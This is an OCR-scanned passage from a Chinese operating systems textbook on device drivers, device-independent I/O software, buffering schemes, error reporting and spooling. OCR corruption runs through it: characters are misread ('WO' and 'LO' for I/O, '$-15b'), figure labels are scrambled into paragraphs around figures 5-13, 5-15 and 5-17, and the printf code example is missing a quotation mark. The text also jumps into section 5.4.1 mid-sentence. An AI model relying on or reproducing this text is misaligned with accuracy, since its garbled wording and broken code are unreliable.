随 着 个 人 计算 机 的 出 现 ， 这 一 模型 不 再 起 作用 ， 因 为 个 人 计算 机 有 太 多 种 类 的 IO 设备 。 即 便 拥 有 
源 代 码 或 目标 模块 ， 也 只 有 很 少 的 用 户 有 能 力 重 新 编译 和 重新 连接 内 核 ， 何 况 他 们 并 不 总 是 拥有 源 代码 
或 目标 模块 。 为 此 ， 从 MS-DOS 开 始 ， 操 作 系 统 转向 驱动 程序 在 执行 期 间 动态 地 装载 到 系统 中 的 另 一 个 
模型 。 不 同 的 操作 系统 以 不 同 的 方式 处 理 驱动 程序 的 装载 工作 。 

设备 驱动 程序 具有 若干 功能 。 最 明显 的 功能 是 接收 来 自 其 上 方 与 设备 无 关 的 软件 所 发 出 的 抽象 的 读 
写 请 求 ， 并 且 目睹 这 些 请 求 被 执行 。 除 此 之 外 ， 还 有 一 些 其 他 的 功能 必须 执行 。 例 如 ， 如 果 需 要 的 话 ， 
驱动 程序 必须 对 设备 进行 初始 化 。 它 可 能 还 需要 对 电源 需求 和 日 志 事 件 进行 管理 。 

许多 设备 驱动 程序 具有 相似 的 一 般 结 构 。 典 型 的 驱动 程序 在 启动 时 要 检查 输入 参数 ， 检 查 输入 参数 
的 目的 是 搞 清 它们 是 否 是 有 效 的 ， 如 果 不 是 ， 则 返回 一 个 错误 。 如 果 输 入 参数 是 有 效 的 ， 则 可 能 需要 进 
行 从 抽象 事项 到 具体 事项 的 转换 。 对 磁盘 驱动 程序 来 说 ， 这 可 能 意味 着 将 一 个 线性 的 磁盘 块 号 转换 成 磁 
盘 几 何 布局 的 磁头 、 磁 道 、 扇 区 和 柱 面 号 。 

接着 ， 驱 动 程序 可 能 要 检查 设备 当前 是 否 在 使 用 。 如 果 在 使 用 ， 请 求 将 被 排 和 人 队列 以 备 稍 后 处 理 。 
如 果 设 备 是 空闲 的 ， 驱 动 程序 将 检查 硬件 状态 以 了 解 请 求 现在 是 否 能 够 得 到 处 理 。 在 传输 能 够 开始 之 前 ， 
可 能 需要 接 通 设备 或 者 启动 马达 。 一 旦 设备 接 通 并 就 绪 ， 实 际 的 控制 就 可 以 开始 了 。 

控制 设备 意味 着 向 设备 发 出 一 系列 命令 。 根 据 控制 设备 必须 要 做 的 工作 ， 由 驱动 程序 处 确定 命令 序 
列 。 驱 动 程序 在 获知 哪些 命令 将 要 发 出 之 后 ， 它 就 开始 将 它们 写 入 控制 器 的 设备 寄存 器 。 驱 动 程序 在 把 
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每 个 命令 写 到 控制 器 之 后 ， 它 可 能 必须 进行 检测 以 了 解 控制 器 是 否 已 经 接收 命令 并 且 准 备 好 接收 下 一 个 
命令 。 这 一 序列 继续 进行 ， 直 到 所 有 命令 被 发 出 。 对 于 某 些 控制 器 ， 可 以 为 其 提供 一 个 在 内 存 中 的 命令 
链表 ， 并 且 告 诉 它 自己 去 读 取 并 处 理 所 有 命令 而 不 需要 操作 系统 提供 进一步 帮助 。 

命令 发 出 之 后 ， 会 牵涉 两 种 情形 之 一 。 在 多 数 情况 下 ， 设 备 驱动 程序 必须 等 待 ， 直 到 控制 器 为 其 做 
某 些 事情 ， 所 以 驱动 程序 将 阻塞 其 自身 直到 中 断 到 来 解除 阻塞 。 然 而 ， 在 另外 一 些 情 况 下 ， 操 作 可 以 无 
延迟 地 完成 ， 所 以 驱动 程序 不 需要 阻塞 。 在 字符 模式 下 滚动 屏幕 只 需要 写 少 许字 节 到 控制 器 的 寄存 器 中 ， 
由 于 不 需要 机 械 运 动 ， 所 以 整个 操作 可 以 在 几 纳 秒 内 完成 ， 这 便 是 后 一 种 情形 的 例子 。 

在 前 一 种 情况 下 ， 阻 塞 的 驱动 程序 可 以 被 中 断 唤醒 。 在 后 一 种 情况 下 ， 驱 动 程序 根本 就 不 会 休眠 。 
无 论 是 哪 一 种 情况 ， 操 作 完成 之 后 驱动 程序 都 必须 检查 错误 。 如 果 一 切 顺 利 ， 驱 动 程序 可 能 要 将 数据 
(例如 刚刚 读 出 的 一 个 磁盘 块 ) 传送 给 与 设备 无 关 的 软件 。 最 后 ， 它 向 调用 者 返回 一 些 用 于 错误 报告 的 
状态 信息 。 如 果 还 有 其 他 未 完成 的 请 求 在 排队 ， 则 选择 一 个 启动 执行 。 如 果 队列 中 没有 未 完成 的 请 求 ， 
则 该 驱动 程序 将 阻塞 以 等 待 下 一 个 请 求 。 

这 一 简单 的 模型 只 是 现实 的 粗略 近似 ， 许 多 因素 使 相关 的 代码 比 这 要 复杂 得 多 。 首 先 ， 当 一 个 驱动 
程序 正在 运行 时 ， 某 个 IO 设备 可 能 会 完成 操作 ， 这 样 就 会 中 断 驱动 程序 。 中 断 可 能 会 导致 一 个 设备 驱 
动 程序 运行 ， 事 实 上 ， 它 可 能 导致 当前 驱动 程序 运行 。 例 如 ， 当 网 络 驱动 程序 正在 处 理 一 个 到 来 的 数据 
包 时 ， 另 一 个 数据 包 可 能 到 来 。 因 此 ， 驱 动 程序 必须 是 重 入 的 〈reentrant) ， 这 意味 着 一 个 正在 运行 的 驱 
动 程序 必须 预料 到 在 第 一 次 调用 完成 之 前 第 二 次 被 调用 。 

在 一 个 可 热 插 拔 的 系统 中 ， 设 备 可 以 在 计算 机 运行 时 添加 或 删除 。 因 此 ， 当 一 个 驱动 程序 正 忙于 从 
某 设备 读数 据 时 ， 系 统 可 能 会 通知 它 用 户 突然 将 设备 从 系统 中 删除 了 。 在 这 样 的 情况 下 ， 不 但 当前 IO 
传送 必须 中 止 并 且 不 能 破坏 任何 核心 数据 结构 ， 而 且 任 何 对 这 个 现 已 消失 的 设备 的 悬而未决 的 请 求 都 必 
须 适 当地 从 系统 中 删除 ， 同 时 还 要 为 它们 的 调用 者 提供 这 一 坏 消 息 。 此 外 ， 未 预料 到 的 新 设备 的 添加 可 
能 导致 内 核 重 新 配置 资源 〈 例 如 中 断 请 求 线 ) ， 从 驱动 程序 中 撤除 旧 资源 ， 并 且 在 适当 位 置 填 和 人 新 资源 。 

驱动 程序 不 允许 进行 系统 调用 ， 但 是 它们 经 常 需要 与 内 核 的 其 余部 分 进行 交互 。 对 某 些 内 核 过 程 的 
调用 通常 是 允许 的 。 例 如 ， 通 常 需要 调用 内 核 过 程 来 分 配 和 释放 硬 接线 的 内 存 页 面 作为 缓冲 区 。 还 可 能 
需要 其 他 有 用 的 调用 来 管理 MMU、 定 时 器 、DMA 控 制 器 、 中 断 控制 器 等 。 


5.3.3 与 设备 无 关 的 I/O 软 件 
虽然 LO 软件 中 有 一 些 是 设备 特定 的 ， 但 是 其 他 部 分 IO 软件 是 与 设备 无 关 的 。 设 备 驱 动 程序 和 与 设 
备 无 关 的 软件 之 间 的 确切 界限 依赖 于 具体 系统 (和 设备 )， 











因为 对 于 一 些 本 来 应 按照 与 设备 无 关 方 式 实现 的 功能 ， | ”设备 驱动 程序 的 统一 接口 
出 于 效率 和 其 他 原因 ， 实 际 上 是 由 驱动 程序 来 实现 的 。 缓冲 
图 5-13 所 示 的 功能 典型 地 由 与 设备 无 关 的 软件 实现 。 错误 报告 





与 设备 无 关 的 软件 的 基本 功能 是 执行 对 所 有 设备 公共 | ”分 配 与 释放 专用 设备 
的 1/0 功 能， 并 且 向 用 户 层 软件 提供 一 个 统一 的 接口 。 接 下 | 提供 与 设备 无 关 的 块 大 小 
来 我 们 将 主 细 介绍 上 述 问题 。 图 5-13 “与 设备 无 关 的 IO 软件 的 功能 

1. 设备 驱动 程序 的 统一 接口 

操作 系统 的 一 个 主要 问题 是 如 何 使 所 有 1/O 设 备 和 驱动 程序 看 起 来 或 多 或 少 是 相同 的 。 如 果 磁盘 、 
打印 机 、 键 盘 等 接口 方式 都 不 相同 ， 那 么 每 次 在 一 个 新 设备 出 现时 ， 都 必须 为 新 设备 修改 操作 系统 。 必 
须 为 每 个 新 设备 修改 操作 系统 绝 不 是 一 个 好 主意 。 

设备 驱动 程序 与 操作 系统 其 余部 分 之 间 的 接口 是 这 一 问题 的 一 个 方面 。 图 5-14a 所 示 为 这 样 一 种 情 
W: 每 个 设备 驱动 程序 有 不 同 的 与 操作 系统 的 接口 。 这 意味 着 ， 可 供 系统 调用 的 驱动 程序 函数 随 驱动 各 
序 的 不 同 而 不 同 。 这 可 能 还 意味 着 ， 驱 动 程序 所 需要 的 内 核 函 数 也 是 随 驱动 程序 的 不 同 而 不 同 的 。 综 合 
起 来 看 ， 这 意味 着 为 每 个 新 的 驱动 程序 提供 接口 都 需要 大 量 全 新 的 编程 工作 。 

相反 ， 图 5-14b 所 示 为 一 种 不 同 的 设计 ， 在 这 种 设计 中 所 有 驱动 程序 具有 相同 的 接口 。 这 样 一 来 ， 
倘 车 符合 驱动 程序 接口 ， 那 么 添加 一 个 新 的 驱动 程序 就 变 得 容易 多 了 。 这 还 意味 着 驱动 程序 的 编写 人 员 
知道 驱动 程序 的 接口 应 该 是 什么 样子 的 。 实 际 上， 虽然 并 非 所 有 的 设备 都 是 绝对 一 样 的 ， 但 是 通常 只 存 
在 少数 设备 类 型 ， 而 它们 的 确 大 体 上 是 相同 的 。 
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图 5-14 a) 没有 标准 的 驱动 程序 接口 ，b) 具有 标准 的 驱动 程序 接口 


这 种 设计 的 工作 方式 如 下 。 对 于 每 一 种 设备 类 型 ， 例 如 磁盘 或 打印 机 ， 操 作 系 统 定义 一 组 驱动 程序 
必须 支持 的 函数 。 对 于 磁盘 而 言 ， 这 些 函 数 自然 地 包含 读 和 写 ， 除 此 之 外 还 包含 开启 和 关闭 电源 、 格 式 
化 以 及 其 他 与 磁盘 有 关 的 事情 。 驱 动 程序 通常 包含 一 张 表格 ， 这 张 表格 具有 针对 这 些 函 数 指向 驱动 程序 
自身 的 指针 。 当 驱动 程序 装载 时 ， 操 作 系 统 记 录 下 这 张 函 数 指针 表 的 地 址 ， 所 以 当 操 作 系 统 需要 调用 一 
个 函数 时 ， 它 可 以 通过 这 张 表 格 发 出 间接 调用 。 这 张 函数 指针 表 定 义 了 驱动 程序 与 操作 系统 其 余部 分 之 
间 的 接口 。 给 定 类 型 (磁盘 、 打 印 机 等 ) 的 所 有 设备 都 必须 服从 这 一 要 求 。 

如 何 给 IO 设备 命名 是 统一 接口 问题 的 另 一 个 方面 。 与 设备 无 关 的 软件 要 负责 把 符号 化 的 设备 名 映 
射 到 适当 的 驱动 程序 上 。 例 如 ， 在 UNIX 系 统 中 ， 像 /dev/disk0 这 样 的 设备 名 唯一 确定 了 一 个 特殊 文件 的 i 
节点 ， 这 个 i 节点 包含 了 主 设备 号 (major device number) ， 主 设备 号 用 于 定位 相应 的 驱动 程序 。i 节 点 还 
包含 次 设备 号 (minor device number) ， 次 设备 号 作为 参数 传递 给 驱动 程序 ， 用 来 确定 要 读 或 写 的 具体 
单元 。 所 有 设备 都 具有 主 设备 号 和 次 设备 号 ， 并 且 所 有 驱动 程序 都 是 通过 使 用 主 设备 号 来 选择 驱动 程序 
而 得 到 访问 。 

与 设备 命名 密切 相关 的 是 设备 保护 。 系 统 如 何 防 止 无 权 访问 设备 的 用 户 访问 设备 呢 ? 在 UNIX 和 
Windows 中 ， 设 备 是 作为 命名 对 象 出 现在 文件 系统 中 的 ， 这 意味 着 针对 文件 的 常规 的 保护 规则 也 适用 于 
IO 设备 。 系 统管 理 员 可 以 为 每 一 个 设备 设置 适当 的 访问 权限 。 

2. 缓冲 

无 论 对 于 块 设备 还 是 对 于 字符 设备 ， 由 于 种 种 原因 ， 缓 冲 也 是 一 个 重要 的 问题 。 我 们 考虑 一 个 想 要 
从 ADSL (Asymmetrical Digital Subscriber Line， 非 对 称 数字 用 户 线路 ) 调制 解 调 器 读 入 数据 的 进程 ， 
很 多 人 在 家 里 使 用 ADSL 调 制 解 调 器 连接 到 互联 网 。 让 用 户 进程 执行 read 系 统 调 用 并 阻塞 自己 以 等 待 字 
符 的 到 来 ， 这 是 对 到 来 的 字符 进行 处 理 的 一 种 可 能 的 策略 。 每 个 字符 的 到 来 都 将 引起 中 断 ， 中 断 服务 过 
程 负责 将 字符 递交 给 用 户 进程 并 且 将 其 解除 阻塞 。 用 户 进程 把 字符 放 到 某 个 地 方 之 后 可 以 对 另 一 个 字符 
执行 读 操作 并 且 再 次 阻塞 。 这 一 模型 如 图 5-15a 所 示 。 


用 户 空间 
内 核 空间 
1 3 
A4 


调制 解 调 器 调制 解 调 器 调制 解 调 器 调制 解 调 器 
a) b) c) d) 
图 5-15 a) 无 缓冲 的 输入 ，b) 用 户 空间 中 的 缓冲 ，c) 内 核 空间 中 的 缓冲 接着 复制 到 用 户 空间 ，d) 内 核 空 
间 中 的 双 缓 冲 
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这 种 处 理 方式 的 问题 在 于 : 对 于 每 个 到 来 的 字符 ， 都 必须 启动 用 户 进程 。 对 于 短暂 的 数据 流量 让 一 
个 进程 运行 许多 次 效率 会 很 低 ， 所 以 这 不 是 一 个 良好 的 设计 。 

图 $-15b 所 示 为 一 种 改进 措施 。 此 处 ， 用 户 进程 在 用 户 空间 中 提供 了 一 个 包含 "个 字符 的 缓冲 区 ， 并 
且 执 行 读 入 "个 字符 的 读 操作 。 中 断 服务 过 程 负责 将 到 来 的 字符 放 和 人 该 缓冲 区 中 直到 缓冲 区 填 满 ， 然 后 
唤醒 用 户 进程 。 这 一 方案 比 前 一 种 方案 的 效率 要 高 很 多 ,但 是 它 也 有 一 个 缺点 当 一 个 字符 到 来 时 ， 如 
果 缓 冲 区 被 分 页 而 调 出 了 内 存 会 出 现 什 么 问题 呢 ? 解决 方法 是 将 缓冲 区 锁定 在 内 存 中 ， 但 是 如 果 许 多 进 
程 都 在 内 存 中 锁定 页 面 ， 那 么 可 用 页 面 池 就 会 收缩 并 且 系 统 性 能 将 下 降 。 

另 一 种 方法 是 在 内 核 空 间 中 创建 一 个 缓冲 区 并 且 让 中 断 处 理 程序 将 字符 放 到 这 个 缓冲 区 中 ， 如 图 
5-15c 所 示 。 当 该 缓冲 区 被 填 满 的 时 候 ， 将 包含 用 户 缓冲 区 的 页 面 调和 人 内存 (如 果 需 要 的 话 ) ， 并 且 在 
一 次 操作 中 将 内 核 缓冲 区 的 内 容 复制 到 用 户 缓冲 区 中 。 这 一 方法 的 效率 要 高 很 多 。 

然而 ， 即 使 这 种 改进 的 方案 也 面临 一 个 问题 : 正当 包含 用 户 缓冲 区 的 页 面 从 磁盘 调和 内 存 的 时 候 有 
新 的 字符 到 来 ， 这 样 会 发 生 什么 事情 ? 因为 缓冲 区 已 满 ， 所 以 没有 地 方 放置 这 些 新 来 的 字符 。 一 种 解 
决 问题 的 方法 是 使 用 第 二 个 内 核 缓 冲 区 。 第 一 个 缓冲 区 填 满 之 后 ， 在 它 被 清空 之 前 ， 使 用 第 二 个 缓冲 
区 ， 如 图 $-15d 所 示 。 当 第 二 个 缓冲 区 填 满 时 ， 就 可 以 将 它 复制 给 用 户 (假设 用 户 已 经 请 求 它 ) 。 当 第 二 
个 缓冲 区 正在 复制 到 用 户 空间 的 时 候 ， 第 一 个 缓 促 区 可 以 用 来 接收 新 的 字符 。 以 这 样 的 方法 ， 两 个 缓冲 
区 轮流 使 用 ， 当 一 个 缓冲 区 正在 被 复制 到 用 户 空间 的 时 候 ， 另 一 个 缓冲 区 正在 收集 新 的 输入 。 像 这 样 的 
缓冲 模式 称 为 双 缓冲 (double buffering), 

缓冲 的 另 一 种 常用 形式 是 循环 缓冲 区 (circular buffer) 。 它 由 一 个 内 存 区域 和 两 个 指针 组 成 。 一 个 指 
针 指 向 下 一 个 空闲 的 字 ， 新 的 数据 可 以 放置 到 此 处 。 另 一 个 指针 指向 缓冲 区 中 数据 的 第 一 个 字 ， 该 字 尚 
未 被 取 走 。 在 许多 情况 下 ， 当 添加 新 的 数据 时 (例如 刚刚 从 网 络 到 来 )， 硬 件 将 推进 第 一 个 指针 ， 而 操作 
系统 在 取 走 并 处 理 数据 时 推进 第 二 个 指针 。 两 个 指针 都 是 环绕 的 ， 当 它们 到 达 顶 部 时 将 回 到 底部 。 

缓冲 对 于 输出 也 是 十 分 重要 的 。 例 如 ， 对 于 没有 缓冲 区 的 调制 解 调 器 ， 我 们 考虑 采用 图 5-15b 的 模 
型 输出 是 如 何 实现 的 。 用 户 进 程 执 行 write 系 统 调用 以 输出 n 个 字符 。 系 统 在 此 刻 有 两 种 选择 。 它 可 以 将 
用 户 阻塞 直到 写 完 所 有 字符 ,但 是 这 样 做 在 低速 的 电话 线 上 可 能 花费 非常 长 的 时 间 。 它 也 可 以 立即 将 用 
户 释 放 并 且 在 进行 IO 的 同时 让 用 户 做 某 些 其 他 计算 ， 但 是 这 会 导致 一 个 更 为 糟糕 的 问题 : 用 户 进程 怎 
样 知道 输出 已 经 完成 并 且 可 以 重用 缓冲 区 ?系统 可 以 生成 一 个 信号 或 软件 中 断 ， 但 是 这 样 的 编程 方式 是 
十 分 困难 的 并 且 被 证 明 是 竞争 条 件 。 对 于 内 核 来 说 更 好 的 解决 方法 是 将 数据 复制 到 一 个 内 核 缓冲 区 中 ， 
与 图 5-15c 相 类 似 (但 是 是 另 一 个 方向 )， 并 且 立 刻 将 调用 者 解除 阻塞 。 现 在 实际 的 1/O 什 么 时 候 完 成 都 没 
有 关系 了 ， 用 户 一 旦 被 解除 阻塞 立刻 就 可 以 自由 地 重用 缓冲 区 。 

缓冲 是 一 种 广泛 采用 的 技术 ， 但 是 它 也 有 不 利 的 方面 。 如 果 数 据 被 缓冲 太 多 次 ， 性 能 就 会 降低 。 例 
如 ， 考 虑 图 5-16 中 的 网 络 。 其 中 ， 一 用 户 进程 
个 用 户 执行 了 一 个 系统 调用 向 网 络 写 
数据 。 内 核 将 数据 包 复制 到 一 个 内 核 
缓冲 区 中 ， 从 而 立即 使 用 户 进程 得 以 
继续 进行 (第 1 步 )。 在 此 刻 ， 用 户 程 
序 可 以 重用 缓冲 区 。 

当 驱 动 程序 被 调用 时 ， 它 将 数据 
包 复制 到 控制 器 上 以 供 输出 (第 2 步 )。 
它 不 是 将 数据 包 从 内 核 内 存 直接 输出 
到 网 线 上 ， 其 原因 是 一 旦 开始 一 个 数 
据 包 的 传输 ， 它 就 必须 以 均匀 的 速度 
继续 下 去 ， 驱 动 程序 不 能 保证 它 能 够 图 5-16 可 能 涉及 多 次 复制 一 个 数据 包 的 网 络 
以 均匀 的 速度 访问 内 存 ， 因 为 DMA 通 道 与 其 他 IO 设备 可 能 正在 窃取 许多 周期 。 不 能 及 时 获得 一 个 字 将 
毁坏 数据 包 ， 而 通过 在 控制 器 内 部 对 数据 包 进行 缓冲 就 可 以 避免 这 一 问题 。 

当 数 据 包 复 制 到 控制 器 的 内 部 缓冲 区 中 之 后 ， 它 就 会 被 复制 到 网 络 上 (第 3 步 )。 数 据 位 被 发 送 之 后 立 
刻 就 会 到 达 接 收 器 ， 所 以 在 最 后 一 位 刚刚 送出 之 后 ， 该 位 就 到 达 了 接收 器 ， 在 这 里 数据 包 在 控制 器 中 被 组 
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冲 。 接 下 来 ， 数 据 包 复制 到 接收 器 的 内 核 缓冲 区 中 (第 4 步 )。 最 后 ， 它 被 复制 到 接收 进程 的 缓冲 区 中 (第 
5 步 )。 然 后 接收 器 通常 会 发 回 一 个 应 答 。 当 发 送 者 得 到 应 答 时 ， 它 就 可 以 自由 地 发 送 下 一 个 数据 包 。 然 而 ， 
应 该 清楚 的 是 ， 所 有 这 些 复制 操作 都 会 在 很 大 程度 上 降低 传输 速率 ， 因 为 所 有 这 些 步 又 必须 有 序 地 发 生 。 

3. 错误 报告 

错误 在 WO 上 下 文中 比 在 其 他 上 下 文中 要 常见 得 多 。 当 错误 发 生 时 ， 操 作 系 统 必 须 尽 最 大 努力 对 它们 进 
行 处 理 。 许 多 错误 是 设备 特定 的 并 且 必 须 由 适当 的 驱动 程序 来 处 理 ， 但 是 错误 处 理 的 框架 是 设备 无 关 的 。 

一 种 类 型 的 IO 错误 是 编程 错误 ， 这 些 错误 发 生 在 一 个 进程 请 求 某 些 不 可 能 的 事情 时 ， 例 如 写 一 个 输 
和 设备 〈 键 盘 、 扫 描 仪 、 鼠 标 等 ) 或 者 读 一 个 输出 设备 (打印 机 、 绘 图 仪 等 )。 其 他 的 错误 包括 提供 了 一 
个 无 效 的 缓冲 区 地 址 或 者 其 他 参数 ， 以 及 指定 了 一 个 无 效 的 设备 〈 例 如 ， 当 系统 只 有 两 块 磁盘 时 指定 了 
磁盘 3) ， 如 此 等 等 。 在 这 些 错误 上 采取 的 行动 是 直截了当 的 : 只 是 将 一 个 错误 代码 报告 返回 给 调用 者 。 

另 一 种 类 型 的 错误 是 实际 的 IO 错误 ， 例 如 ， 试 图 写 一 个 已 经 被 破坏 的 磁盘 块 ， 或 者 试图 读 一 个 已 
经 关机 的 便携 式 摄像 机 。 在 这 些 情形 中 ， 应 该 由 驱动 程序 决定 做 什么 。 如 果 驱 动 程序 不 知道 做 什么 ， 它 
应 该 将 问题 向 上 传递 ， 返 回 给 与 设备 无 关 的 软件 。 

软件 要 做 的 事情 取决 于 环境 和 错误 的 本 质 。 如 果 是 一 个 简单 的 读 错误 并 且 存在 一 个 交互 式 的 用 户 可 
利用 ， 那 么 它 就 可 以 显示 一 个 对 话 框 来 询问 用 户 做 什么 。 选 项 可 能 包括 重 试 一 定 的 次 数 ， 忽 略 错误 ， 或 
者 杀 死 调用 进程 。 如 果 没 有 用 户 可 利用 ， 唯 一 的 实际 选择 或 许 就 是 以 一 个 错误 代码 让 系统 调用 失败 。 

然而 ， 某 些 错误 不 能 以 这 样 的 方式 来 处 理 。 例 如 ， 关 键 的 数据 结构 (如 根 目录 或 空闲 块 列表 ) 可 能 
已 经 被 破坏 ， 在 这 种 情况 下 ， 系 统 也 许 只 好 显示 一 条 错误 消息 并 且 终止 ， 并 不 存在 多 少 其 他 事情 可 以 做 。 

4. 分 配 与 释放 专用 设备 

某 些 设备 ， 例 如 打印 机 ， 在 任意 给 定 的 时 刻 只 能 由 一 个 进程 使 用 。 这 就 要 求 操作 系统 对 设备 使 用 的 
请 求 进行 检查 ， 并 且 根 据 被 请 求 的 设备 是 否 可 用 来 接受 或 者 拒绝 这 些 请 求 。 处 理 这 些 请 求 的 一 种 简单 方 
法 是 要 求 进程 在 代表 设备 的 特殊 文件 上 直接 执行 open 操 作 。 如 果 设 备 是 不 可 用 的 ， 那 么 open 就 会 失败 。 
于 是 就 关闭 这 样 的 一 个 专用 设备 ， 然 后 将 其 释放 。 

一 种 代替 的 方法 是 对 于 请 求 和 释放 专用 设备 要 有 特殊 的 机 制 。 试 图 得 到 不 可 用 的 设备 可 以 将 调用 者 
阻塞 ， 而 不 是 让 其 失败 。 阻 塞 的 进程 被 放 入 一 个 队列 。 迟 早 被 请 求 的 设备 会 变 得 可 用 ， 这 时 就 可 以 让 队 
列 中 的 第 一 个 进程 得 到 该 设备 并 且 继续 执行 。 

5. 与 设备 无 关 的 块 大 小 

不 同 的 磁盘 可 能 具有 不 同 的 扁 区 大 小 。 应 该 由 与 设备 无 关 的 软件 来 隐藏 这 一 事实 并 且 向 高 层 提供 一 
个 统一 的 块 大 小 ， 例 如 ， 将 若干 个 扇 区 当 作 一 个 逻辑 块 。 这 样 ， 高 层 软 件 就 只 需 处 理 抽象 的 设备 ， 这 些 
抽象 设备 全 部 都 使 用 相同 的 逻辑 块 大 小 ， 与 物理 扇 区 的 大 小 无 关 。 类 似 地 ， 某 些 字符 设备 〈 如 鼠标 ) 一 
次 一 个 字 节 地 交付 它们 的 数据 ， 而 其 他 的 设备 (如 网 络 接口 ) 则 以 较 大 的 单位 交付 它们 的 数据 。 这 些 差 
异 也 可 以 被 隐藏 起 来 。 


5.3.4 用户 空 间 的 I/O 软 件 

尽管 大 部 分 IO 软件 都 在 操作 系统 内 部 ， 但 是 仍然 有 一 小 部 分 在 用 户 空 间 ， 包 括 与 用 户 程序 连接 在 
一 起 的 库 ， 甚 至 完全 运行 于 内 核 之 外 的 程序 。 系 统 调用 (包括 IO 系统 调用 ) 通常 由 库 过 程 实现 。 当 一 
个 C 程 序 包含 调用 

count=write(fd, buffer, nbytes), 
时 ， 库 过 程 write 将 与 该 程序 连接 在 一 起 ， 并 包含 在 运行 时 出 现在 内 存 中 的 二 进 制 程序 中 。 所 有 这 些 库 过 
程 的 集合 显然 是 IO 系统 的 组 成 部 分 。 

虽然 这 些 过 程 所 做 的 工作 不 过 是 将 这 些 参数 放 在 合适 的 位 置 供 系 统 调用 使 用 ， 但 是 确 有 其 他 IO 过 
程 实际 实现 真正 的 操作 。 输 入 和 输出 的 格式 化 是 由 库 过 程 完成 的 。 一 个 例子 是 C 语 言 中 的 printf， 它 以 一 
个 格式 串 和 可 能 的 一 些 变量 作为 输入 ， 构 造 一 个 ASCI 字 符 串 ， 然 后 调用 write 以 输出 这 个 串 。 作 为 printf 
的 一 个 例子 ， 考 虑 语句 

printf("The square of %3d is %6d\n i, i*i); 


该 语句 格式 化 一 个 字符 串 ， 该 字符 串 是 这 样 组 成 的 : 先是 14 个 字符 的 串 “The square of ”( 注 意 of 后 有 
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一 个 空格 ) ， 随 后 是 ; 值 作为 3 个 字符 的 串 ， 然 后 是 4 个 字符 的 串 “is”( 广 意 前 后 各 有 一 个 空格 ) Bade? 
值 作为 6 个 字符 的 串 ， 最 后 是 一 个 换行 。 

对 输入 而 言 ， 类 似 过 程 的 一 个 例子 是 scanf， 它 读 取 输 入 并 将 其 存放 到 一 些 变量 中 ， 采 用 与 printf 同 
样 语法 的 格式 串 来 描述 这 些 变 量 。 标 准 的 IO 库 包 含 许 多 涉及 IO 的 过 程 ， 它 们 都 是 作为 用 户 程序 的 一 部 
分 运行 的 。 

并 非 所 有 的 用 户 层 IO 软件 都 是 由 库 过 程 组 成 的 。 另 一 个 重要 的 类 别 是 假 脱 机 系统 。 假 脱 机 
(spooling) 是 多 道 程序 设计 系统 中 处 理 独占 IO 设备 的 一 种 方法 。 考 虑 一 种 典型 的 假 脱 机 设备 : 打印 机 。 
尽管 在 技术 上 可 以 十 分 容易 地 让 任何 用 户 进程 打开 表示 该 打印 机 的 字符 特殊 文件 ， 但 是 假如 一 个 进程 打 
开 它 ， 然 后 很 长 时 间 不 使 用 ， 则 其 他 进程 都 无 法 打印 。 

另 一 种 方法 是 创建 一 个 特殊 进程 ， 称 为 守护 进程 (daemon) ， 以 及 一 个 特殊 目录 ， 称 为 假 脱 机 目录 
(spooling directory)。 一 个 进程 要 打印 一 个 文件 时 ， 首 先生 成 要 打印 的 整个 文件 ， 并 且 将 其 放 在 假 脱 机 
目录 下 。 由 守护 进程 打印 该 目录 下 的 文件 ， 该 进程 是 允许 使 用 打印 机 特殊 文件 的 唯一 进程 。 通 过 保护 特 
殊 文件 来 防止 用 户 直 接 使 用 ， 可 以 解决 某 些 进 程 不 必要 地 长 期 空 占 打印 机 的 问题 。 

假 脱 机 不 仅仅 用 于 打印 机 ， 还 可 以 在 其 他 情况 下 使 用 。 例 如 ， 通 过 网 络 传输 文件 常常 使 用 一 个 网 络 
守护 进程 。 要 发 送 一 个 文件 到 某 个 地 方 ， 用 户 可 以 将 该 文件 放 在 一 个 网 络 假 脱 机 目录 下 。 稍 后 ， 由 网 络 
守护 进程 将 其 取出 并 且 发 送出 去 。 这 种 假 脱 机 文件 传输 方式 的 一 个 特定 用 途 是 USENET 新 闻 系 统 (现在 
是 Google Groups 的 一 部 分 )， 该 网 络 由 世界 上 使 用 因特网 进行 通信 的 成 千 上 万 台 计算 机 组 成 ， 针 对 许多 
话题 存在 着 几 千 个 新 闻 组 。 要 发 送 一 条 新 闻 消 息 ， 用 户 可 以 调用 新 闻 程 序 ， 访 程序 接收 要 发 出 的 消息 ， 
然后 将 其 存放 在 假 脱 机 目录 中 ， 待 以 后 发 送 到 其 他 计算 机 上 。 整 个 新 闻 系 统 是 在 操作 系统 之 外 运行 的 。 

图 5-17 对 I/O 系 统 进行 了 总 结 ， 给 出 了 所 有 层次 以 及 每 一 层 的 主要 功能 。 从 底部 开始 ， 这 些 层 是 硬 
件 、 中 断 处 理 程序 、 设 备 驱动 程序 、 与 设 









备 无 关 的 软件 ， 最 后 是 用 户 进程 。 层次 LO 应 答 19 功能 
图 5-17 中 的 箭头 表明 了 控制 流 。 例 如 ， ”jo 产生 IO 请 求 ， 对 IO 进行 格 
块 时 ， 操 作 系统 被 调用 以 实现 这 一 请 求 。 命名 、 保 护 、 分 块 、 缓 冲 、 
与 设备 无 关 的 软件 在 缓冲 区 高 速 缓存 中 查 oe 
找 有 无 要 读 的 块 。 如 果 需 要 的 块 不 在 其 中 ， 设置 设备 寄存 器 ， 检 查 状 态 
处 理 = pjk 二 

求 ， 让 它 从 磁盘 中 获取 该 块 。 然 后 ， 进 程 | emme Aa E 
被 阻塞 直到 磁盘 操作 完成 并 且 数 据 在 调用 执行 WO 操作 
者 的 缓冲 区 中 安全 可 用 。 
断 。 中 断 处 理 程序 就 会 运行 ， 它 要 查 明 发 
生 了 什么 事情 ， 也 就 是 说 此 刻 需要 关注 哪个 设备 。 然 后 ， 中 断 处 理 程序 从 设备 提取 状态 信息 ， 唤 醒 休眠 
的 进程 以 结束 此 次 MO 请 求 ， 并 且 让 用 户 进程 继续 运行 。 

现在 我 们 开始 研究 某 些 实际 的 IO 设备 。 我 们 将 从 盘 开 始 ， 盘 的 概念 简单 ， 但 是 非常 重要 。 然 后 ， 
我 们 将 研究 时 钟 、 键 盘 和 显示 器 。 
5.4.1 盘 硬 件 
为 辅助 存储 器 (用 于 分 页 、 文 件 系统 等 )。 这 些 盘 的 阵列 有 时 用 来 提供 高 可 靠 性 的 存储 器 。 对 于 程序 、 
数据 和 电影 的 发 行 而 言 ， 光 盘 (DVD 和 蓝光 光盘 ) 也 非常 重要 。 最 后 ， 固 态 盘 越 来 越 流 行 ， 它 们 速度 快 
